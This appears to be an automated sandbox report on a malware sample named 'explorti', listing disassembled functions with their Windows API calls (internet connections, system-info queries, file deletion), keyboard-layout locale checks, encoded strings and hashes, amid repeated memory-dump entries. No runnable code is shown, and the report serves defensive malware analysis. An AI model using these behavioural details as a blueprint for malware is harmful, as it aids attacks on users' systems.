Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range$-Y
API String ID: 3545240790-2020708354
Opcode ID: 50b3dea6269a2128f273815ae4a4d5a45c24407cd20ed78cd01305019f937b3d
Instruction ID: 927eecfe2450596630423df3cd29f463cd055c5e781dee2fced62e4f46135bd4
Opcode Fuzzy Hash: 50b3dea6269a2128f273815ae4a4d5a45c24407cd20ed78cd01305019f937b3d
Instruction Fuzzy Hash: 8823F371A001589BEF19DB28CD897DDBF76BB86308F5481D8E009A7292EB355F84CF52

Function 00535DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000422, xrefs: 00535FD9
00000419, xrefs: 00535FA8
0000043f, xrefs: 0053603B
Keyboard Layout\Preload, xrefs: 00535F64
00000423, xrefs: 0053600A

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: ffff3d7d3617ef7527d9b492627c3c0e6fda44d4d8be05ff44734a3bd7685702
Instruction ID: 029ea037153ef8949da2fa9bc5ce042dbdc5c48c9121071311508f39dbeca1e7
Opcode Fuzzy Hash: ffff3d7d3617ef7527d9b492627c3c0e6fda44d4d8be05ff44734a3bd7685702
Instruction Fuzzy Hash: E2E16D71900219BBEF24DBA4CC8DBDEBB79BB44304F5042D9E509A7292DB749BC88F51

Function 00537D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00537EA3

Strings

HlusMa==, xrefs: 0053810A
HlurOK==, xrefs: 00538062
HlurNa==, xrefs: 005381B2

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: HlurNa==$HlurOK==$HlusMa==
API String ID: 1721193555-2203186029
Opcode ID: daff585d1d3754ff62bdd86f7486f9c424bd21d0f58941b1d77ab593e9ff6f92
Instruction ID: 2589d850d573234d91be8f6727347b9b2311c301196cfd109d35d31e988b2c64
Opcode Fuzzy Hash: daff585d1d3754ff62bdd86f7486f9c424bd21d0f58941b1d77ab593e9ff6f92
Instruction Fuzzy Hash: 48D1FA74E00609A7DF14AB68CC5A3AD7F71BB86314F944288F415A73D2DB354E848BD2

Function 00566E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00566E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00566E7D
__dosmaperr.LIBCMT ref: 00566F12

Part of subcall function 00567177: __dosmaperr.LIBCMT ref: 005671AC

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 3ec7a9b3ab6e2a19f9c5d4b5879b2ec32ac54e2e51fa76dafcc31fbcd1a2de41
Instruction ID: 4c981425450533908426293884e76d7e45bbfe023860a6cb39a265d29638df0f
Opcode Fuzzy Hash: 3ec7a9b3ab6e2a19f9c5d4b5879b2ec32ac54e2e51fa76dafcc31fbcd1a2de41
Instruction Fuzzy Hash: BA414C75900209ABDB24EFB5EC599ABBFF9FF89300B10482DF456D3210EA31A944CB61

Function 0056AF0B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00546B27,?,'kTd+Y,0054D32C,'kTd+Y,?,005478FB,?,05210980), ref: 0056AF3E

Strings

'kTd+Y, xrefs: 0056AF0D

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 'kTd+Y
API String ID: 1279760036-721370433
Opcode ID: 992e5abdc654745e7363df7a5d40e7f48c72c89ac81db994bba1ca0af280fd4d
Instruction ID: 480faa8fc009432eccd3bbf6a1688fc5c56aaffccd6034c4dad636b154e3e337
Opcode Fuzzy Hash: 992e5abdc654745e7363df7a5d40e7f48c72c89ac81db994bba1ca0af280fd4d
Instruction Fuzzy Hash: 79E0EDBA20A22266EA2033755D45B6ABE8CFF823B2F050251AC14B7181DF61CC009AE3

Function 00566C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6179ae35137b385b1e8ead39c44a6e1635a35b7a101322b1dc1dd5d8267d3c
Instruction ID: d6db9f5e51a7cd98aaae9f5593fbe5155ed8fd9090d5e5a571e789da1c7e1e96
Opcode Fuzzy Hash: 5e6179ae35137b385b1e8ead39c44a6e1635a35b7a101322b1dc1dd5d8267d3c
Instruction Fuzzy Hash: 7D21D671A052097BEB117B649C4AB9F3F29BF82778F200310F9243B1D1DB705E0596A2

Function 0056B515 Relevance: 3.0, APIs: 2, Instructions: 19
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,005669C7,?), ref: 0056B51D
__dosmaperr.LIBCMT ref: 0056B52E

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: DeleteFile__dosmaperr
String ID:
API String ID: 1911827773-0
Opcode ID: 3c4d7f261d8181d115fcd731deebc97f82c93970804f6a738b03f56e7955be99
Instruction ID: dbc8a125c128494049f9cdbfa63157040ee2d911d55227ea81e80f253883e209
Opcode Fuzzy Hash: 3c4d7f261d8181d115fcd731deebc97f82c93970804f6a738b03f56e7955be99
Instruction Fuzzy Hash: D9D0127225A108365E1036F67C0C8573E8D6FD17743251A11F82DC6591EE66D8914491

Function 005382B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00538454

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 0cf3dc29567563b97a456e1f6f443aec05e0f940e8269c9a088b2f087bf4a03b
Instruction ID: f61cee8a6da4ab00c94226274138252b57dfd1a23d510f894bcca5a9a5b1b875
Opcode Fuzzy Hash: 0cf3dc29567563b97a456e1f6f443aec05e0f940e8269c9a088b2f087bf4a03b
Instruction Fuzzy Hash: 19512770900309ABEF18EB68CD497EEBF75BB45314F904299F814A73D1EF355A848BA1

Function 00566F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00566FB3

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 84be15d6911f91f202cdd8e7580d80a84b4bb90d161de0eb6d97780339364cac
Instruction ID: 4863fb76e83bed7b27ad94859f8eb01b2c943961fa07a0108a879ef8f7ca2c6e
Opcode Fuzzy Hash: 84be15d6911f91f202cdd8e7580d80a84b4bb90d161de0eb6d97780339364cac
Instruction Fuzzy Hash: 9F11ECB690020DBBCB10DE95D944EDFBBBCAF48310F505666E511E7184EB34EB48CB61

Function 00546AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00546B65

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4f0152067d8da2c1458c548e4989c3f5998b6650caaa0154eb0b9fa3440167b0
Instruction ID: c16ad9ecd640610da1846b7148c8fbbd066c3d7a35f79d8ba70ef53ab641c358
Opcode Fuzzy Hash: 4f0152067d8da2c1458c548e4989c3f5998b6650caaa0154eb0b9fa3440167b0
Instruction Fuzzy Hash: EDF0D131A00618BBC700BBA89D0AB5DBF75BB47764F800748E821672E1EB345A0897D3

Function 052806C7 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb4b53d71094781650b4c97e15c77944369b65861739eda312d772cd8faf035e
Instruction ID: 48c1ab631245808310ef4e9ed5668f6a2d7247b07e86e0e1be45a2436350d5c4
Opcode Fuzzy Hash: cb4b53d71094781650b4c97e15c77944369b65861739eda312d772cd8faf035e
Instruction Fuzzy Hash: 322160EB17E010BD7102E2C62B5C9F66B6FF9D6730335842AF407D6582E2C44A8D5571

Function 052806F1 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c724e35343dae73627f3b3dc60d6b14fbf24a1d4ff86a26d7af217173d3eeb5
Instruction ID: e8e2154b38479a642826771ffd284fd5546ddcfebf3b5225b13b1313347efbb8
Opcode Fuzzy Hash: 0c724e35343dae73627f3b3dc60d6b14fbf24a1d4ff86a26d7af217173d3eeb5
Instruction Fuzzy Hash: CB216DEB17E421BD7212F2D52B5C9FBA76FE8D6730330843AF406C6582E2C44A5D6571

Function 052806C0 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c081cdf54086ce8234affad5eb0be6e78abe13d8b4a01dbdb4c79a8527d65fbe
Instruction ID: b452cafe68b5bdc180f0fec28b33baf9c0408c879969dc70c1b7024900d07a96
Opcode Fuzzy Hash: c081cdf54086ce8234affad5eb0be6e78abe13d8b4a01dbdb4c79a8527d65fbe
Instruction Fuzzy Hash: 63211AEB1BE020BD7142E2C62B5CAF65B6FE9D67303318526F407D5982E2C44A9D2571

Function 052806E1 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523f4c799cd7c3c98318279c3a47b7b4fd5ee6318192afa3bf8ec12415926c0a
Instruction ID: 533b855e9567f3660c4e7395757b7b8ee02ea38ee3433a02c25a3c507f270b5c
Opcode Fuzzy Hash: 523f4c799cd7c3c98318279c3a47b7b4fd5ee6318192afa3bf8ec12415926c0a
Instruction Fuzzy Hash: 59213AEF1BE010BD7102E2C62B5D9F6976FE9D67303308426F407D6982E2C40A4D6571

Function 0528074B Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45af9241dbdc5059e44b3f33271a2850a64418b526f590b3c714b7762d243e1d
Instruction ID: 3fbd3686f682cce95f29c41bd0291e58c3012ca9d5307355564a0ef143c9e61f
Opcode Fuzzy Hash: 45af9241dbdc5059e44b3f33271a2850a64418b526f590b3c714b7762d243e1d
Instruction Fuzzy Hash: A31148EB27E010BD7202E2C62B589FA676FE9D6730330C43AF406C6582E2D44A8E2571

Function 0528077E Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5437ad7891fd62b1694ef58693802833bfa3af3a83e4e6ff3580e3f19c0a98
Instruction ID: 26d1665d79e07909c7d87330c5f778135be88fd43070f8124b047e296ceec910
Opcode Fuzzy Hash: 8f5437ad7891fd62b1694ef58693802833bfa3af3a83e4e6ff3580e3f19c0a98
Instruction Fuzzy Hash: DE0157EB17E010BD3212E2C63B589FB676EE9D6B30331C42BF846C2582E2D44A9D6571

Function 0528072A Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7cc0a0d0df7fd1f5ee974b889fa620f68cac1169ac41c101249f9f9621ee81
Instruction ID: 910982576ee1b33593086e1b926393bcf3147fe73bada35ca73f263b4568e00c
Opcode Fuzzy Hash: 6e7cc0a0d0df7fd1f5ee974b889fa620f68cac1169ac41c101249f9f9621ee81
Instruction Fuzzy Hash: 5E0117EB17E010BD3201E2C62B5C9BB576FE9D2730331C42BF807C6582E2D44A8D5571

Function 052807BA Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76591daf30a0141f24c3ed48943724cddb76b7d20f7cd60e22969dea9bf6ae0e
Instruction ID: 94a3938e0045e24c7921656ee064f63661a44212cb722b547ffb9d110dfef70d
Opcode Fuzzy Hash: 76591daf30a0141f24c3ed48943724cddb76b7d20f7cd60e22969dea9bf6ae0e
Instruction Fuzzy Hash: 6F016DEB17E4106DB201E1C53B5CAFB6B1FE9D2A30775883BF447C6186A2D54A4E15B0

Function 0528079E Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ef160cb8f3e92c9c60d05cfa6e42f2f3bc2b98301a213742450c3ba936c3ea
Instruction ID: 63301c04f6ecc4701c61f28a82d3aa8e7adc2defb74dc0876359f4c01e8efc26
Opcode Fuzzy Hash: b2ef160cb8f3e92c9c60d05cfa6e42f2f3bc2b98301a213742450c3ba936c3ea
Instruction Fuzzy Hash: 5F0156EB17E011AC7202E1C63B58AFB575FE9D6731335842BF406C6582E2C84A8E1171

Function 052807F5 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5280000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5276ba03188f67a7d3ea1ccf274e79b60e3782ac50d2bc39ccdde4386164ba2
Instruction ID: 9302d73af2b6a8f40a286b0581945fb55d6b8396eff167262c51b01ffd3f1e82
Opcode Fuzzy Hash: c5276ba03188f67a7d3ea1ccf274e79b60e3782ac50d2bc39ccdde4386164ba2
Instruction Fuzzy Hash: 4EF0F8EB13E011AD3241E1C23B18ABA535FE8D5730375C437F406C1546D2C84A8D50B0

Non-executed Functions

Function 00573068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

